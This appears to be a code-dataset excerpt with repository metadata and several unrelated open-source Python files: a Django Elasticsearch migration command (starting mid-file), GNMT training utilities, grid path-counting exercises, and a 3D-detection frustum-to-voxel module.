:param creates: a list of ``(document_adapter, new_name)`` tuples
:param updates: a list of ``(document_adapter, properties_dict)`` tuples
:param deletes: a list of index names
:returns: a Migration instance
"""
migration = Migration("custom", self.DJANGO_APP_LABEL)
if not self.empty:
def verify_and_append_migration_operation(operation):
"""Ensure there are not multiple operations for the same index
and append the operation to the migration."""
default_op = ops_by_index_name.setdefault(operation.name, operation)
if default_op is not operation:
raise CommandError("\n - ".join([
f"Multiple operations for the same index ({operation.name}):",
repr(default_op),
repr(operation),
]))
migration.operations.append(operation)
ops_by_index_name = {}
# build 'create' operations
for adapter, new_name in creates:
verify_and_append_migration_operation(CreateIndex(
new_name,
adapter.type,
adapter.mapping,
adapter.analysis,
adapter.settings_key,
))
# build 'update' operations
for adapter, properties in updates:
verify_and_append_migration_operation(UpdateIndexMapping(
adapter.index_name,
adapter.type,
properties=properties,
))
# build 'delete' operations
for index_name in deletes:
verify_and_append_migration_operation(DeleteIndex(index_name))
return migration
def arrange_migration_changes(self, migration):
"""Performs the 'makemigrations' boilerplate responsible for building
the 'changes' collection with the next migration number, auto migration
name detection, etc.
:param migration: a Migration instance
:returns: changes dict
"""
from django.apps import apps
from django.db.migrations.autodetector import MigrationAutodetector
from django.db.migrations.loader import MigrationLoader
from django.db.migrations.questioner import NonInteractiveMigrationQuestioner
from django.db.migrations.state import ProjectState
loader = MigrationLoader(None)
autodetector = MigrationAutodetector(
loader.project_state(),
ProjectState.from_apps(apps),
NonInteractiveMigrationQuestioner(specified_apps=[migration.app_label]),
)
return autodetector.arrange_for_graph(
changes={migration.app_label: [migration]},
graph=loader.graph,
migration_name=self.migration_name,
)
@staticmethod
def adapter_type(value):
"""Returns a document adapter for the provided index canonical name
supplied as the ``CNAME`` portion of the ``--create`` and ``--update``
argument values.
:param value: canonical name of the index.
:raises: ``argparse.ArgumentTypeError`` if ``value`` is not a valid
canonical name.
"""
try:
return doc_adapter_from_cname(value)
except KeyError:
raise ArgumentTypeError(
f"Invalid index canonical name ({value}), "
f"choices: {sorted(iter_index_cnames())}"
)
def adapter_and_name_type(self, value):
"""Returns a tuple of ``(document_adapter, new_index_name)`` for the
provided ``--create`` argument value whose format is
``CNAME[:NEW_INDEX_NAME]`` where ``CNAME`` is a valid index canonical
name and (optional) ``NEW_INDEX_NAME`` is the name to use for the new
index.
If the new name syntax (``:NEW_INDEX_NAME``) is omitted, an automatic
new name is returned, derived from the index canonical name and today's
date.
:param value: the value of a ``--create`` argument
:raises: ``argparse.ArgumentTypeError`` if ``value`` uses invalid syntax
or refers to an invalid index canonical name or property name.
"""
cname, delim, new_name = value.partition(":")
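        # Illustrative note (not in the original file; the canonical name is
        # hypothetical): "case_search:my-new-index" parses to
        # cname == "case_search" and new_name == "my-new-index", while a bare
        # "case_search" falls through to the auto-generated
        # "case-search-<YYYYMMDD>" name built below.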
adapter = self.adapter_type(cname)
if not delim:
new_name = f"{cname.replace('_', '-')}-{datetime.utcnow():%Y%m%d}"
elif not new_name:
raise ArgumentTypeError(
f"Invalid (empty) new name for create action: {value!r}"
)
return adapter, new_name
def adapter_and_properties_type(self, value):
"""Returns a tuple of ``(document_adapter, properties_dict)`` for the
provided ``--update`` argument value whose format is
``CNAME[:PROPERTY[,PROPERTY ...]]`` where ``CNAME`` is a valid index
canonical name and (optional) ``PROPERTY`` is/are valid property name(s)
in the specified index's mapping.
If the property list syntax (``:PROPERTY...``) is omitted, all
properties for the index are returned.
:param value: the value of an ``--update`` argument
:raises: ``argparse.ArgumentTypeError`` if ``value`` uses invalid syntax
or refers to an invalid index canonical name or property name.
"""
cname, delim, property_names = value.partition(":")
adapter = self.adapter_type(cname)
properties = all_properties = adapter.mapping["properties"]
if delim:
properties = {}
for name in property_names.split(","):
if not name:
continue
try:
properties[name] = all_properties[name]
except KeyError:
raise ArgumentTypeError(
f"Invalid property name for index: {cname} (got "
f"{name!r}, expected one of {sorted(all_properties)})"
)
if not properties:
raise ArgumentTypeError(
f"Invalid (empty) property list for update action: {value!r}"
)
return adapter, properties
|
6403fcfe8ef8a56c852fa65493f2242ccda6666c
|
f4ac42a3316e8815cdd307fbe11229438d0cb951
|
/Kernels/Research/FFT/config/strtools.py
|
a1ce449077fa0e759098c96ebb247921c16ad86f
|
[
"Apache-2.0"
] |
permissive
|
ARM-software/EndpointAI
|
6879c160645c741d217421050cc824bb06eb6471
|
b18e7ddc6e14229a724f2d7ae1f6c721013cbb68
|
refs/heads/master
| 2023-07-31T22:20:37.023081
| 2023-05-18T15:25:11
| 2023-05-18T15:25:11
| 292,621,053
| 231
| 96
|
Apache-2.0
| 2021-07-31T23:18:44
| 2020-09-03T16:19:43
|
C
|
UTF-8
|
Python
| false
| false
| 900
|
py
|
strtools.py
|
#
#
# Copyright (C) 2010-2021 ARM Limited or its affiliates. All rights reserved.
#
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the License); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an AS IS BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
def joinit(iterable, delimiter):
    # Intersperse a delimiter between the elements of a list
it = iter(iterable)
yield next(it)
for x in it:
yield delimiter
yield x
def joinStr(str):
return("".join(joinit(str,",")))
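# Minimal usage sketch (not in the original file): interleave a delimiter
# between list elements, then collapse the result into a single string.
if __name__ == "__main__":
    parts = ["vec", "len", "dot"]
    print(list(joinit(parts, ",")))  # ['vec', ',', 'len', ',', 'dot']
    print(joinStr(parts))            # vec,len,dot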
|
9098f7a3e6660ace92105df9ca945810b962ad20
|
cad91ae76d2746a6c28ddda0f33a58f9d461378f
|
/PyTorch/Translation/GNMT/seq2seq/utils.py
|
2164dd39bd0cc13e73f9a3d382ff41bc7013667e
|
[
"MIT"
] |
permissive
|
NVIDIA/DeepLearningExamples
|
fe677521e7e2a16e3cb0b77e358f9aab72f8c11a
|
a5388a45f71a949639b35cc5b990bd130d2d8164
|
refs/heads/master
| 2023-08-31T20:57:08.798455
| 2023-08-23T10:09:12
| 2023-08-23T10:09:12
| 131,881,622
| 11,838
| 3,124
| null | 2023-08-28T16:57:33
| 2018-05-02T17:04:05
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 12,801
|
py
|
utils.py
|
# Copyright (c) 2017 Elad Hoffer
# Copyright (c) 2018-2020, NVIDIA CORPORATION. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import logging.config
import os
import random
import sys
import time
from contextlib import contextmanager
import dllogger
import numpy as np
import torch
import torch.distributed as dist
import torch.nn.init as init
import torch.utils.collect_env
def init_lstm_(lstm, init_weight=0.1):
"""
Initializes weights of LSTM layer.
Weights and biases are initialized with uniform(-init_weight, init_weight)
distribution.
:param lstm: instance of torch.nn.LSTM
:param init_weight: range for the uniform initializer
"""
# Initialize hidden-hidden weights
init.uniform_(lstm.weight_hh_l0.data, -init_weight, init_weight)
# Initialize input-hidden weights:
init.uniform_(lstm.weight_ih_l0.data, -init_weight, init_weight)
# Initialize bias. PyTorch LSTM has two biases, one for input-hidden GEMM
# and the other for hidden-hidden GEMM. Here input-hidden bias is
# initialized with uniform distribution and hidden-hidden bias is
# initialized with zeros.
init.uniform_(lstm.bias_ih_l0.data, -init_weight, init_weight)
init.zeros_(lstm.bias_hh_l0.data)
if lstm.bidirectional:
init.uniform_(lstm.weight_hh_l0_reverse.data, -init_weight, init_weight)
init.uniform_(lstm.weight_ih_l0_reverse.data, -init_weight, init_weight)
init.uniform_(lstm.bias_ih_l0_reverse.data, -init_weight, init_weight)
init.zeros_(lstm.bias_hh_l0_reverse.data)
def generate_seeds(rng, size):
"""
Generate list of random seeds
:param rng: random number generator
:param size: length of the returned list
"""
seeds = [rng.randint(0, 2**32 - 1) for _ in range(size)]
return seeds
def broadcast_seeds(seeds, device):
"""
Broadcasts random seeds to all distributed workers.
Returns list of random seeds (broadcasted from workers with rank 0).
:param seeds: list of seeds (integers)
:param device: torch.device
"""
if torch.distributed.is_available() and torch.distributed.is_initialized():
seeds_tensor = torch.tensor(seeds, dtype=torch.int64, device=device)
torch.distributed.broadcast(seeds_tensor, 0)
seeds = seeds_tensor.tolist()
return seeds
def setup_seeds(master_seed, epochs, device):
"""
Generates seeds from one master_seed.
Function returns (worker_seeds, shuffling_seeds), worker_seeds are later
used to initialize per-worker random number generators (mostly for
    dropouts), shuffling_seeds are for RNGs responsible for reshuffling the
dataset before each epoch.
Seeds are generated on worker with rank 0 and broadcasted to all other
workers.
:param master_seed: master RNG seed used to initialize other generators
:param epochs: number of epochs
:param device: torch.device (used for distributed.broadcast)
"""
if master_seed is None:
# random master seed, random.SystemRandom() uses /dev/urandom on Unix
master_seed = random.SystemRandom().randint(0, 2**32 - 1)
if get_rank() == 0:
# master seed is reported only from rank=0 worker, it's to avoid
# confusion, seeds from rank=0 are later broadcasted to other
# workers
logging.info(f'Using random master seed: {master_seed}')
else:
# master seed was specified from command line
logging.info(f'Using master seed from command line: {master_seed}')
# initialize seeding RNG
seeding_rng = random.Random(master_seed)
# generate worker seeds, one seed for every distributed worker
worker_seeds = generate_seeds(seeding_rng, get_world_size())
# generate seeds for data shuffling, one seed for every epoch
shuffling_seeds = generate_seeds(seeding_rng, epochs)
# broadcast seeds from rank=0 to other workers
worker_seeds = broadcast_seeds(worker_seeds, device)
shuffling_seeds = broadcast_seeds(shuffling_seeds, device)
return worker_seeds, shuffling_seeds
def barrier():
"""
    Calls torch.distributed.barrier() if distributed is in use, otherwise calls
    torch.cuda.synchronize() if CUDA is initialized.
"""
if torch.distributed.is_available() and torch.distributed.is_initialized():
torch.distributed.barrier()
elif torch.cuda.is_available() and torch.cuda.is_initialized():
torch.cuda.synchronize()
def get_rank():
"""
Gets distributed rank or returns zero if distributed is not initialized.
"""
if torch.distributed.is_available() and torch.distributed.is_initialized():
rank = torch.distributed.get_rank()
else:
rank = 0
return rank
def get_world_size():
"""
Gets total number of distributed workers or returns one if distributed is
not initialized.
"""
if torch.distributed.is_available() and torch.distributed.is_initialized():
world_size = torch.distributed.get_world_size()
else:
world_size = 1
return world_size
@contextmanager
def sync_workers():
"""
Yields distributed rank and synchronizes all workers on exit.
"""
rank = get_rank()
yield rank
barrier()
@contextmanager
def timer(name, ndigits=2, sync_gpu=True):
if sync_gpu:
torch.cuda.synchronize()
start = time.time()
yield
if sync_gpu:
torch.cuda.synchronize()
stop = time.time()
elapsed = round(stop - start, ndigits)
logging.info(f'TIMER {name} {elapsed}')
def setup_logging(log_all_ranks=True, log_file=os.devnull):
"""
Configures logging.
By default logs from all workers are printed to the console, entries are
prefixed with "N: " where N is the rank of the worker. Logs printed to the
    console don't include timestamps.
Full logs with timestamps are saved to the log_file file.
"""
class RankFilter(logging.Filter):
def __init__(self, rank, log_all_ranks):
self.rank = rank
self.log_all_ranks = log_all_ranks
def filter(self, record):
record.rank = self.rank
if self.log_all_ranks:
return True
else:
return (self.rank == 0)
rank = get_rank()
rank_filter = RankFilter(rank, log_all_ranks)
for handler in logging.root.handlers[:]:
logging.root.removeHandler(handler)
handler.close()
logging_format = "%(asctime)s - %(levelname)s - %(rank)s - %(message)s"
logging.basicConfig(level=logging.DEBUG,
format=logging_format,
datefmt="%Y-%m-%d %H:%M:%S",
filename=log_file,
filemode='w')
console = logging.StreamHandler(sys.stdout)
console.setLevel(logging.INFO)
formatter = logging.Formatter('%(rank)s: %(message)s')
console.setFormatter(formatter)
logging.getLogger('').addHandler(console)
logging.getLogger('').addFilter(rank_filter)
def setup_dllogger(enabled=True, filename=os.devnull):
rank = get_rank()
if enabled and rank == 0:
backends = [
dllogger.JSONStreamBackend(
dllogger.Verbosity.VERBOSE,
filename,
),
]
dllogger.init(backends)
else:
dllogger.init([])
dllogger.metadata("test_bleu", {"unit": None})
dllogger.metadata("eval_90%_latency", {"unit": "ms"})
dllogger.metadata("eval_avg_latency", {"unit": "ms"})
dllogger.metadata("train_elapsed", {"unit": "s"})
dllogger.metadata("eval_throughput", {"unit": "tokens/s"})
dllogger.metadata("train_throughput", {"unit": "tokens/s"})
def set_device(cuda, local_rank):
"""
Sets device based on local_rank and returns instance of torch.device.
:param cuda: if True: use cuda
:param local_rank: local rank of the worker
"""
if cuda:
torch.cuda.set_device(local_rank)
device = torch.device('cuda')
else:
device = torch.device('cpu')
return device
def init_distributed(cuda):
"""
Initializes distributed backend.
:param cuda: (bool) if True initializes nccl backend, if False initializes
gloo backend
"""
world_size = int(os.environ.get('WORLD_SIZE', 1))
distributed = (world_size > 1)
if distributed:
backend = 'nccl' if cuda else 'gloo'
dist.init_process_group(backend=backend,
init_method='env://')
assert dist.is_initialized()
return distributed
def log_env_info():
"""
Prints information about execution environment.
"""
logging.info('Collecting environment information...')
env_info = torch.utils.collect_env.get_pretty_env_info()
logging.info(f'{env_info}')
def pad_vocabulary(math):
if math == 'tf32' or math == 'fp16' or math == 'manual_fp16':
pad_vocab = 8
elif math == 'fp32':
pad_vocab = 1
return pad_vocab
def benchmark(test_acc, target_acc, test_perf, target_perf):
def test(achieved, target, name):
passed = True
if target is not None and achieved is not None:
logging.info(f'{name} achieved: {achieved:.2f} '
f'target: {target:.2f}')
if achieved >= target:
logging.info(f'{name} test passed')
else:
logging.info(f'{name} test failed')
passed = False
return passed
passed = True
passed &= test(test_acc, target_acc, 'Accuracy')
passed &= test(test_perf, target_perf, 'Performance')
return passed
def debug_tensor(tensor, name):
"""
Simple utility which helps with debugging.
Takes a tensor and outputs: min, max, avg, std, number of NaNs, number of
INFs.
:param tensor: torch tensor
:param name: name of the tensor (only for logging)
"""
logging.info(name)
tensor = tensor.detach().float().cpu().numpy()
logging.info(f'MIN: {tensor.min()} MAX: {tensor.max()} '
f'AVG: {tensor.mean()} STD: {tensor.std()} '
f'NAN: {np.isnan(tensor).sum()} INF: {np.isinf(tensor).sum()}')
class AverageMeter:
"""
Computes and stores the average and current value
"""
def __init__(self, warmup=0, keep=False):
self.reset()
self.warmup = warmup
self.keep = keep
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
self.iters = 0
self.vals = []
def update(self, val, n=1):
self.iters += 1
self.val = val
if self.iters > self.warmup:
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
if self.keep:
self.vals.append(val)
def reduce(self, op):
"""
Reduces average value over all workers.
:param op: 'sum' or 'mean', reduction operator
"""
if op not in ('sum', 'mean'):
raise NotImplementedError
distributed = (get_world_size() > 1)
if distributed:
backend = dist.get_backend()
cuda = (backend == dist.Backend.NCCL)
if cuda:
avg = torch.cuda.FloatTensor([self.avg])
_sum = torch.cuda.FloatTensor([self.sum])
else:
avg = torch.FloatTensor([self.avg])
_sum = torch.FloatTensor([self.sum])
dist.all_reduce(avg)
dist.all_reduce(_sum)
self.avg = avg.item()
self.sum = _sum.item()
if op == 'mean':
self.avg /= get_world_size()
self.sum /= get_world_size()
|
ea1c3055ae685a9f3caab6d8a0f506afaea2c320
|
d4412fbe37540e2c4cbe59ed6503d3661ccb7d9c
|
/colossalai/utils/data_sampler/__init__.py
|
12798a94c2d063bb120f805967e748c5a1059a3a
|
[
"BSD-3-Clause",
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0",
"BSD-2-Clause",
"MIT"
] |
permissive
|
hpcaitech/ColossalAI
|
a082ed08a3807b53c49d1f86835b9808590d9042
|
c7b60f75470f067d1342705708810a660eabd684
|
refs/heads/main
| 2023-09-01T04:13:13.834565
| 2023-08-30T15:07:21
| 2023-08-30T15:07:21
| 422,274,596
| 32,044
| 4,084
|
Apache-2.0
| 2023-09-14T15:19:54
| 2021-10-28T16:19:44
|
Python
|
UTF-8
|
Python
| false
| false
| 177
|
py
|
__init__.py
|
from .base_sampler import BaseSampler
from .data_parallel_sampler import DataParallelSampler, get_dataloader
__all__ = ['BaseSampler', 'DataParallelSampler', 'get_dataloader']
|
83683a98a0ab97ab3cacaefe57cd9760f4634c27
|
ebd9c249d446d809abc9a0f3e4593f34922a1b93
|
/other/unique_paths_with_followups.py
|
5e3ba18db3720c83e3cb6bef3183a71194544db4
|
[] |
no_license
|
jaychsu/algorithm
|
ac7a9dc7366f58c635a68bc46bf1640d2f5ff16d
|
91892fd64281d96b8a9d5c0d57b938c314ae71be
|
refs/heads/master
| 2023-05-11T00:40:39.237813
| 2022-09-14T07:43:12
| 2022-09-14T07:43:12
| 106,277,156
| 143
| 39
| null | 2022-09-14T07:43:13
| 2017-10-09T11:51:48
|
Python
|
UTF-8
|
Python
| false
| false
| 6,792
|
py
|
unique_paths_with_followups.py
|
"""
Given the width and height of a rectangle, count all possible paths.
Rules:
1. Walk from the top-left corner to the top-right corner.
2. Each step may only move straight right, up-right, or down-right, i.e. →↗↘
followup1: optimize the space complexity to O(n)
followup2: given three points inside the rectangle, determine whether a path visiting all three points exists
followup3: given three points inside the rectangle, count all paths that visit the three points
followup4: given a lower bound (x == H), count all paths that reach the given lower bound (x >= H)
followup5: change the start and end to go from top-left to bottom-left, with each step only ↓↘↙, and count all possible paths
"""
def find_unique_paths(m, n):
"""
:type m: int
:type n: int
:rtype: int
>>> gotcha = [
... find_unique_paths(*_in) == _out
... for _in, _out in (
... ((2, 2), 1), ((2, 3), 2), ((3, 3), 2),
... ((5, 5), 9), ((7, 6), 21), ((6, 7), 51),
... )
... ]
>>> bool(gotcha) and all(gotcha)
True
"""
if not m or not n:
return 0
dp = [[0] * n for _ in range(m)]
dp[0][0] = 1
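    # Illustrative sketch (not in the original file): each cell in column y is
    # only reachable from column y - 1 via the three allowed moves, giving
    #     dp[x][y] = dp[x][y - 1] + dp[x - 1][y - 1] + dp[x + 1][y - 1]
    # with out-of-range terms dropped; for a 3x3 grid this yields
    # dp[0][2] == 2, matching the ((3, 3), 2) doctest above.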
for y in range(1, n):
for x in range(m):
dp[x][y] = dp[x][y - 1]
if x > 0:
dp[x][y] += dp[x - 1][y - 1]
if x + 1 < m:
dp[x][y] += dp[x + 1][y - 1]
return dp[0][n - 1]
def find_unique_paths1(m, n):
"""
:type m: int
:type n: int
:rtype: int
>>> gotcha = [
... find_unique_paths1(*_in) == _out
... for _in, _out in (
... ((2, 2), 1), ((2, 3), 2), ((3, 3), 2),
... ((5, 5), 9), ((7, 6), 21), ((6, 7), 51),
... )
... ]
>>> bool(gotcha) and all(gotcha)
True
"""
if not m or not n:
return 0
dp = [0] * m
dp[0] = 1
pre = cur = 0
for y in range(1, n):
pre = cur = 0
for x in range(m):
pre, cur = cur, dp[x]
if x > 0:
dp[x] += pre
if x + 1 < m:
dp[x] += dp[x + 1]
return dp[0]
def find_unique_paths2(m, n, points):
"""
:type m: int
:type n: int
:type points: list[list[int]]
:rtype: bool
>>> gotcha = [
... find_unique_paths2(*_in) == _out
... for _in, _out in (
... ((2, 3, [[1, 0], [1, 1], [1, 2]]), False),
... ((3, 3, [[1, 0], [2, 1], [1, 2]]), False),
... ((3, 3, [[1, 0], [1, 1], [1, 2]]), False),
... ((5, 5, [[0, 1], [2, 2], [1, 3]]), False),
... ((5, 5, [[1, 1], [2, 2], [1, 3]]), True),
... ((5, 5, [[2, 2], [1, 1], [1, 3]]), True),
... ((6, 8, [[0, 0], [4, 3], [0, 7]]), False),
... ((8, 6, [[1, 1], [0, 4], [1, 3]]), True),
... ((8, 6, [[1, 1], [0, 4], [2, 3]]), False),
... )
... ]
>>> bool(gotcha) and all(gotcha)
True
"""
if not m or not n or not points or len(points) < 3:
return False
path = [(0, 0), (0, n - 1)]
path.extend(tuple(p) for p in points)
path.sort(key=lambda p: (p[1], p[0]))
for i in range(1, len(path)):
x, y = path[i]
_x, _y = path[i - 1]
delta = y - _y
if not (x - delta <= _x <= x + delta):
return False
return True
def find_unique_paths3(m, n, points):
"""
:type m: int
:type n: int
:type points: list[list[int]]
:rtype: int
>>> gotcha = [
... find_unique_paths3(*_in) == _out
... for _in, _out in (
... ((2, 3, [[1, 0], [1, 1], [1, 2]]), 0),
... ((3, 3, [[1, 0], [2, 1], [1, 2]]), 0),
... ((3, 3, [[1, 0], [1, 1], [1, 2]]), 0),
... ((5, 5, [[0, 1], [2, 2], [1, 3]]), 0),
... ((5, 5, [[1, 1], [2, 2], [1, 3]]), 1),
... ((5, 5, [[2, 2], [1, 1], [1, 3]]), 1),
... ((6, 8, [[0, 0], [4, 3], [0, 7]]), 0),
... ((8, 6, [[0, 0], [0, 5], [0, 4]]), 9),
... ((8, 6, [[1, 1], [0, 4], [2, 3]]), 0),
... )
... ]
>>> bool(gotcha) and all(gotcha)
True
"""
NOT_FOUND = 0
if not m or not n or not points:
return NOT_FOUND
points.sort(key=lambda p: (p[1], p[0]))
dp = [[0] * n for _ in range(m)]
dp[0][0] = 1
k = len(points)
i = 0
while points[i][1] == 0:
i += 1
if i >= k:
return NOT_FOUND
for y in range(1, n):
for x in range(m):
dp[x][y] = dp[x][y - 1]
if x > 0:
dp[x][y] += dp[x - 1][y - 1]
if x + 1 < m:
dp[x][y] += dp[x + 1][y - 1]
if i < k and y == points[i][1]:
for x in range(m):
if x != points[i][0]:
dp[x][y] = 0
i += 1
return dp[0][n - 1] if i == k else NOT_FOUND
def find_unique_paths4(m, n, h):
"""
:type m: int
:type n: int
:type h: int
:rtype: int
>>> gotcha = [
... find_unique_paths4(*_in) == _out
... for _in, _out in (
... ((2, 3, 1), 1), ((3, 3, 1), 1), ((3, 3, 2), 0),
... ((4, 4, 0), 4), ((4, 4, 1), 3), ((4, 4, 2), 0),
... ((6, 7, 0), 51), ((6, 7, 1), 50), ((6, 7, 2), 19),
... ((6, 7, 3), 1), ((6, 7, 4), 0), ((6, 7, 5), 0)
... )
... ]
>>> bool(gotcha) and all(gotcha)
True
"""
if not m or not n:
return 0
dp = [[0] * n for _ in range(m)]
dp[0][0] = 1
for y in range(1, n):
for x in range(m):
dp[x][y] = dp[x][y - 1]
if x > 0:
dp[x][y] += dp[x - 1][y - 1]
if x + 1 < m:
dp[x][y] += dp[x + 1][y - 1]
if h < 1:
return dp[0][n - 1]
for y in range(n):
for x in range(h):
dp[x][y] = 0
for y in range(1, n):
for x in range(h - 1, -1, -1):
dp[x][y] = dp[x][y - 1]
if x > 0:
dp[x][y] += dp[x - 1][y - 1]
if x + 1 < m:
dp[x][y] += dp[x + 1][y - 1]
return dp[0][n - 1]
def find_unique_paths5(m, n):
"""
:type m: int
:type n: int
:rtype: int
>>> gotcha = [
... find_unique_paths5(*_in) == _out
... for _in, _out in (
... ((2, 2), 1), ((2, 3), 1), ((3, 3), 2),
... ((5, 5), 9), ((7, 6), 51), ((6, 7), 21),
... )
... ]
>>> bool(gotcha) and all(gotcha)
True
"""
if not m or not n:
return 0
dp = [[0] * n for _ in range(m)]
dp[0][0] = 1
for x in range(1, m):
for y in range(n):
dp[x][y] = dp[x - 1][y]
if y > 0:
dp[x][y] += dp[x - 1][y - 1]
if y + 1 < n:
dp[x][y] += dp[x - 1][y + 1]
return dp[m - 1][0]
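if __name__ == '__main__':
    # Minimal runner (not in the original file): the expected outputs are
    # already encoded as doctests above, so executing the module directly
    # verifies all five variants.
    import doctest
    doctest.testmod()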
|
810a158324610dbdd5d4925cd7214433f042ad64
|
e9aabf2d3c117f37230d89bc4516b984074a1e81
|
/mmdet3d/models/necks/feature_transformation.py
|
0eab64fbe62aa00433dbb1f39c28120e28f74f4d
|
[
"Apache-2.0"
] |
permissive
|
Tai-Wang/Depth-from-Motion
|
d0934396e588700f6cf8fd1a2c11f6a5d5d0b428
|
e2321189f923564788d59a627129fc10a9db191b
|
refs/heads/main
| 2023-05-24T01:34:35.666074
| 2022-10-11T11:52:03
| 2022-10-11T11:52:03
| 516,021,516
| 278
| 25
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,914
|
py
|
feature_transformation.py
|
# Copyright (c) OpenMMLab. All rights reserved.
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.utils.data
from mmcv.cnn import ConvModule
from mmcv.runner import BaseModule
from mmdet.models.builder import NECKS
@NECKS.register_module()
class FrustumToVoxel(BaseModule):
def __init__(
self,
num_3dconvs=1, # num of 3d conv layers before hourglass
cv_channels=32, # cost volume channels
out_channels=32, # out volume channels after conv/pool
in_sem_channels=32,
sem_atten_feat=True,
stereo_atten_feat=False,
cat_img_feature=True,
norm_cfg=dict(type='GN', num_groups=32,
requires_grad=True) # use GN by default
):
super(FrustumToVoxel, self).__init__()
# general config
self.GN = True # TODO: replace it with norm_cfg
# volume config
self.num_3dconvs = num_3dconvs
self.cv_channels = cv_channels
self.out_channels = out_channels
self.in_sem_channels = in_sem_channels
# aggregate features args
self.sem_atten_feat = sem_atten_feat
self.stereo_atten_feat = stereo_atten_feat
self.cat_img_feature = cat_img_feature
# conv layers for voxel feature volume (after grid sampling)
voxel_channels = self.cv_channels
if getattr(self, 'cat_img_feature', False):
if self.cat_img_feature:
voxel_channels += self.in_sem_channels
else:
self.cat_img_feature = False
voxel_convs = []
for i in range(self.num_3dconvs):
voxel_convs.append(
nn.Sequential(
ConvModule(
voxel_channels if i == 0 else self.out_channels,
self.out_channels,
kernel_size=3,
stride=1,
padding=1,
conv_cfg=dict(type='Conv3d'),
norm_cfg=norm_cfg)))
self.voxel_convs = nn.Sequential(*voxel_convs)
self.voxel_pool = nn.AvgPool3d((4, 1, 1), stride=(4, 1, 1))
self.init_weights()
def forward(self,
stereo_feat,
stereo_feat_softmax,
img_metas,
cur_sem_feats=None):
cam2imgs = torch.as_tensor(
[img_meta['cam2img'] for img_meta in img_metas],
dtype=torch.float32,
device=stereo_feat.device)
batch_size = len(img_metas)
# stereo_feat as the root of voxel_feat sampling
# stereo_feat_softmax as the attention mask for lifting 2D sem_feat
# to 3D space
# 1. convert plane-sweep into 3d volume
coordinates_3d = self.coordinates_3d.cuda()
norm_coord_imgs = []
coord_imgs = []
valids2d = []
for i in range(batch_size):
c3d = coordinates_3d.view(-1, 3)
# in pseudo lidar coord
c3d = project_pseudo_lidar_to_rectcam(c3d)
# coord_img = project_rect_to_image(
# c3d, cam2imgs[i].float().cuda())
coord_img = project_rect_to_image(c3d,
cam2imgs[i][:3].float().cuda())
coord_img = torch.cat([coord_img, c3d[..., 2:]], dim=-1)
coord_img = coord_img.view(*self.coordinates_3d.shape[:3], 3)
coord_imgs.append(coord_img)
# TODO: to modify for bs>1
pad_shape = img_metas[0]['pad_shape']
valid_mask_2d = (coord_img[..., 0] >= 0) & (coord_img[
..., 0] <= pad_shape[1]) & (coord_img[..., 1] >= 0) & (
coord_img[..., 1] <= pad_shape[0])
valids2d.append(valid_mask_2d)
# TODO: check whether the shape is right here
crop_x1, crop_x2 = 0, pad_shape[1]
crop_y1, crop_y2 = 0, pad_shape[0]
norm_coord_img = (coord_img - torch.as_tensor(
[crop_x1, crop_y1, self.depth_cfg['depth_min']],
device=coord_img.device)) / torch.as_tensor(
[
crop_x2 - 1 - crop_x1, crop_y2 - 1 - crop_y1,
self.depth_cfg['depth_max'] -
self.depth_cfg['depth_min']
],
device=coord_img.device)
norm_coord_img = norm_coord_img * 2. - 1.
norm_coord_imgs.append(norm_coord_img)
norm_coord_imgs = torch.stack(norm_coord_imgs, dim=0)
coord_imgs = torch.stack(coord_imgs, dim=0)
valids2d = torch.stack(valids2d, dim=0)
valids = valids2d & (norm_coord_imgs[..., 2] >= -1.) & (
norm_coord_imgs[..., 2] <= 1.)
valids = valids.float()
# 2. Retrieve Voxel Feature from Cost Volume Feature
Voxel = F.grid_sample(stereo_feat, norm_coord_imgs, align_corners=True)
Voxel = Voxel * valids[:, None, :, :, :]
if (self.stereo_atten_feat
or (self.sem_atten_feat and self.cat_img_feature)):
pred_disp = F.grid_sample(
stereo_feat_softmax.detach(),
norm_coord_imgs,
align_corners=True)
pred_disp = pred_disp * valids[:, None, :, :, :]
if self.stereo_atten_feat:
Voxel = Voxel * pred_disp
# 3. Retrieve Voxel Feature from 2D Img Feature
if self.cat_img_feature:
norm_coord_imgs_2d = norm_coord_imgs.clone().detach()
norm_coord_imgs_2d[..., 2] = 0
Voxel_2D = F.grid_sample(
cur_sem_feats.unsqueeze(2),
norm_coord_imgs_2d,
align_corners=True)
Voxel_2D = Voxel_2D * valids2d.float()[:, None, :, :, :]
if self.sem_atten_feat:
Voxel_2D = Voxel_2D * pred_disp
if Voxel is not None:
Voxel = torch.cat([Voxel, Voxel_2D], dim=1)
else:
Voxel = Voxel_2D
# (1, 64, 20, 304, 288)
Voxel = self.voxel_convs(Voxel)
# volume_features_nopool = Voxel
# (1, 32, 20, 304, 288)
Voxel = self.voxel_pool(
Voxel) # [B, C, Nz, Ny, Nx] in cam (not img frustum) view
# (1, 32, 5, 304, 288)
volume_features = Voxel
return volume_features
